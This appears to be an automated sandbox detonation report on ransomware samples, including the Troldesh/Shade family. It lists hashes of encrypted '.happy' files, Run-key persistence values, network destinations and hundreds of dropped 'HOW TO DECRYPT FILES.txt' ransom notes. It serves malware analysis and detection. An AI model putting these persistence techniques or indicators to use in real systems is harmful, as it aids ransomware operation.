| SHA512 | 115c516bd4dca3f95bfb0a798b3e433304b710fd0fc8bba6a21115580226c459227f18c30fbd707f55f82b85f3cb9dd3ee20c5ea8385e1dde9616db4d76685d9 |
C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21399_.GIF.happy
| MD5 | 7987e50f723c961b923a647331833535 |
| SHA1 | def607e5cdffcb3dbeae3323b1677a431595ec70 |
| SHA256 | 8c309b2d6e139db42bdcf11877952f6c0c3b2fe830831203f3ee1540ab2ae66a |
| SHA512 | e1cfbc3032aa6952548e47597f33823569582fd1c8689fa9cbf86eb7bd62ab791f9e92312fe8f8814ffa038144aa8af37994077e7d5eac1d6d8a78010eac9ee3 |
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF.happy
| MD5 | 45bd5bd092121df1cfcb0489bf47f124 |
| SHA1 | c65807db9286e2eea58890538ea40cf2e0686c5e |
| SHA256 | dec76487284a836d9ebb829452b2a728e42a547d756af7fc8542207b0c77909e |
| SHA512 | 46f5394a91dff835e572d90a793ff6cebe84ea803401a26e206a8444daa774bb2bfa528a79b6eb74a4c88e3a027deef50ef6a97b45000b82c68c7ddb7818f696 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
123s
Max time network
197s
Command Line
Signatures
Troldesh family
Troldesh, Shade, Encoder.858
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe
"C:\Users\Admin\AppData\Local\Temp\unpacked.mem.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49201 | tcp | |
| US | 154.35.32.5:443 | tcp | |
| US | 208.83.223.34:80 | tcp | |
| DE | 131.188.40.189:443 | tcp |
Files
memory/2136-0-0x0000000000400000-0x00000000005DA000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-22 03:39
Reported
2024-11-22 03:44
Platform
win7-20240903-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Renames multiple (2207) files with added filename extension
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\drivers\en-US\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\es-ES\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\fr-FR\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\gmreadme.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\it-IT\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\de-DE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RYiGElV1ZFlQ3US.exe" | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\wiabr007.inf_amd64_neutral_442d902f3f3dd5b7\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Signing.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmtron.inf_amd64_neutral_1121c7f92e9e3001\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnky303.inf_amd64_ja-jp_b054bb0d59e0a3ad\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\wsdscdrv.inf_amd64_neutral_47406488f9e8d5b8\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\zh-TW\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mchgr.inf_amd64_neutral_407146dba80d1566\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ph3xibc10.inf_amd64_neutral_2c5d0c618dbfaf2a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnrc303.inf_amd64_ja-jp_b0dcc6693f67451a\Amd64\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\InstallShield\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_arrays.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\TroubleshootingPack\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnlx002.inf_amd64_neutral_12563574abbc36eb\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\sbp2.inf_amd64_neutral_332943647e950ada\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_remote_requirements.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_preference_variables.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmnis3t.inf_amd64_neutral_857ff0fa9c73850a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\_Default\UltimateE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_logical_operators.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_neutral_814744dd97ccf09f\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_Arithmetic_Operators.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_join.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnep00c.inf_amd64_neutral_f0d9ddf52f04765c\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_debuggers.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Throw.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Windows_PowerShell_2.0.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_properties.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnep003.inf_amd64_neutral_92ed2d842e0dd4ea\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnlx007.inf_amd64_neutral_0b796ee4978458e2\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\StarterN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdmmhrtz.inf_amd64_neutral_10affee00545fb45\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ja-JP\about_aliases.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ph3xibc11.inf_amd64_neutral_bb18e5f134c40c68\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-COM-DTC-Setup-DL\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\PostMigRes\Web\base_images\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_environment_variables.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_Return.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_environment_variables.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\it-IT\Licenses\eval\HomeBasicE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_PSSnapins.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\about_Language_Keywords.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_eventlogs.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\de-DE\Licenses\OEM\EnterpriseN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\cdrom.inf_amd64_neutral_0b3d0d1942ab684b\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netvfx64.inf_amd64_neutral_194cb6d2ea3a486e\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnbr004.inf_amd64_neutral_a78e168d6944619a\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\es-ES\Licenses\OEM\ProfessionalE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\ras\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\XPSViewer\de-DE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\brmfcmf.inf_amd64_neutral_67b5984f8e8ff717\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\prnep00d.inf_amd64_neutral_dd61103f3a2743d4\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\ja-JP\Licenses\_Default\UltimateN\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\migwiz\dlmanifests\Microsoft-Windows-International-Core-DL\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\sv-SE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\es-ES\about_debuggers.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\eval\Enterprise\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_Reserved_Words.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\en-US\Licenses\OEM\ProfessionalE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Windows\SysWOW64\fr-FR\Licenses\_Default\ProfessionalE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\about_Session_Configurations.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\fr-FR\about_debuggers.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\it-IT\about_arrays.help.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\kab\LC_MESSAGES\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Swirl\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\decorative_rule.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Microsoft Games\More Games\de-DE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent_partly-cloudy.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14513_.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactHighMask.bmp | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\da.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\DVD Maker\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\settings.html | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_down.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Common Files\System\msadc\ja-JP\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\rssBackBlue_docked.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\hint_down.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\icon.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\12.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\RADIAL\THMBNAIL.PNG | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Person.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_OFF.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_windy.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\TAB_ON.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\Stationery\HandPrints.jpg | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Java\jre7\bin\dtplugin\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\css\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\America\Argentina\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\uninstall\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonDown_On.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationLeft_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_SlateBlue.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\README.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system_m.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLowMask.bmp | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_ON.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\HOW TO DECRYPT FILES.txt | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382958.JPG | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR42F.GIF | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099168.JPG | C:\Users\Admin\AppData\Local\Temp\unpacked.ex_.exe | N/A |
